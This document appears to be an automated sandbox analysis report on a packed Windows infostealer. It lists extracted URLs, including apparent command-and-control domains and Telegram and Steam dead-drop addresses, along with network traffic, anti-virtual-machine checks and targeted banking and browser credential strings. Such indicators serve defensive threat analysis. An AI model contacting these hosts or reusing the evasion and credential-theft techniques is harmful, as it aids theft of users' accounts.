              Source: biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/u1_
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamloopback.host
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sterpickced.digital/v
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sterpickced.digital/z
              Source: biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
              Source: biyhoksefdad.exe, 00000000.00000002.1710644682.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1710644682.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCou
              Source: biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
              Source: biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: biyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: biyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
              Source: biyhoksefdad.exe, 00000000.00000003.1352280152.0000000001013000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1352384780.0000000001014000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/kz_prokla2
              Source: biyhoksefdad.exe, biyhoksefdad.exe, 00000000.00000003.1578076106.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1541790012.000000000101E000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1627352228.0000000001020000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FF5000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1542359493.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/
              Source: biyhoksefdad.exe, 00000000.00000003.1627352228.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/?
              Source: biyhoksefdad.exe, 00000000.00000003.1627352228.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/S
              Source: biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1542359493.000000000102F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/SwnNW
              Source: biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/SwnNW)
              Source: biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/SwnNWcCa
              Source: biyhoksefdad.exe, 00000000.00000003.1443109110.0000000003CB4000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1446558191.0000000003CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/SwnNWceb
              Source: biyhoksefdad.exe, 00000000.00000003.1627352228.000000000102F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/SwnNWt
              Source: biyhoksefdad.exe, 00000000.00000003.1627352228.000000000102F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/SwnNWv
              Source: biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/g
              Source: biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop:443/SwnNWN
              Source: biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
              Source: biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=ccd2df26ae62a59bd6_101925322770
Source: biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://web.telegram.orgX-Frame-OptionsALLOW-FROM
Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: biyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: biyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: biyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: biyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: biyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: biyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:49722 version: TLS 1.2

System Summary

Source: biyhoksefdad.exe | Static PE information: section name: (nameless)
Source: biyhoksefdad.exe | Static PE information: section name: (nameless)
Source: biyhoksefdad.exe | Static PE information: section name: (nameless)
Source: biyhoksefdad.exe | Static PE information: section name: (nameless)
Source: biyhoksefdad.exe | Static PE information: section name: (nameless)
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_01002E7B
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_0100F0A7
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_00FB9E11
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_00FAE5E1
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_00FACBC2
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_00FAE5B4
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_00FDA8D4
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_00FDAC4C
Source: biyhoksefdad.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: biyhoksefdad.exe | Static PE information: Section: (nameless) ZLIB complexity 0.9997251590568862
Source: biyhoksefdad.exe | Static PE information: Section: (nameless) ZLIB complexity 0.996337890625
Source: biyhoksefdad.exe | Static PE information: Section: .data ZLIB complexity 0.9970991290983606
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@11/3
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: biyhoksefdad.exe, 00000000.00000003.1448679075.0000000003CB0000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1398957135.0000000003D95000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1447247440.0000000003CC8000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1402899936.0000000003CBB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: biyhoksefdad.exe | ReversingLabs: Detection: 68%
Source: biyhoksefdad.exe | Virustotal: Detection: 60%
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File read: C:\Users\user\Desktop\biyhoksefdad.exe
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Section loaded: userenv.dll
Source: biyhoksefdad.exe | Static file information: File size 1312768 > 1048576

Data Obfuscation

Source: C:\Users\user\Desktop\biyhoksefdad.exe | Unpacked PE file: 0.2.biyhoksefdad.exe.a80000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: biyhoksefdad.exe | Static PE information: section name: (nameless)
Source: biyhoksefdad.exe | Static PE information: section name: (nameless)
Source: biyhoksefdad.exe | Static PE information: section name: (nameless)
Source: biyhoksefdad.exe | Static PE information: section name: (nameless)
Source: biyhoksefdad.exe | Static PE information: section name: (nameless)
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_01021C71 push ss; ret | 0_3_01021C42
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_01021C71 push ss; iretd | 0_3_01021CA2
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_0101EB98 push 7800FDCBh; retf | 0_3_0101EB9D
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_0101EBA8 push A800FDCAh; retf | 0_3_0101EBAD
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_0102ABBA push esp; retf 006Fh | 0_3_0102ABDE
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_01032875 push esp; retf 006Fh | 0_3_01032876
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_00FFD81E push edi; retf | 0_3_00FFD831
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_00FFCE1D push eax; retf | 0_3_00FFCE45
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_00FFCBBC push eax; retf | 0_3_00FFCC61
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_00FCF688 pushfd ; retf | 0_3_00FCF689
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_00FCF22A push ds; retf | 0_3_00FCF299
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Code function: 0_3_00FC7F74 push esp; retf | 0_3_00FC7FF6
Source: biyhoksefdad.exe | Static PE information: section name: (nameless) entropy: 7.998877241773601
Source: biyhoksefdad.exe | Static PE information: section name: (nameless) entropy: 7.929991287486017
Source: biyhoksefdad.exe | Static PE information: section name: (nameless) entropy: 7.936481889423268
Source: biyhoksefdad.exe | Static PE information: section name: (nameless) entropy: 7.924636797507748
Source: biyhoksefdad.exe | Static PE information: section name: .data entropy: 7.983447049442333
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\biyhoksefdad.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\biyhoksefdad.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Window / User API: threadDelayed 724
Source: C:\Users\user\Desktop\biyhoksefdad.exe TID: 8336 | Thread sleep count: 724 > 30
Source: C:\Users\user\Desktop\biyhoksefdad.exe TID: 8408 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\Desktop\biyhoksefdad.exe TID: 8356 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\biyhoksefdad.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D98000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696428655p
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: biyhoksefdad.exe, biyhoksefdad.exe, 00000000.00000003.1627352228.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1578141492.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709348151.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1541986119.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1541835345.0000000000FC7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: biyhoksefdad.exe, 00000000.00000002.1708761696.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: &VBoxService.exe
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: biyhoksefdad.exe, 00000000.00000003.1627352228.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1578141492.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709348151.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1541986119.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1541835345.0000000000FC7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
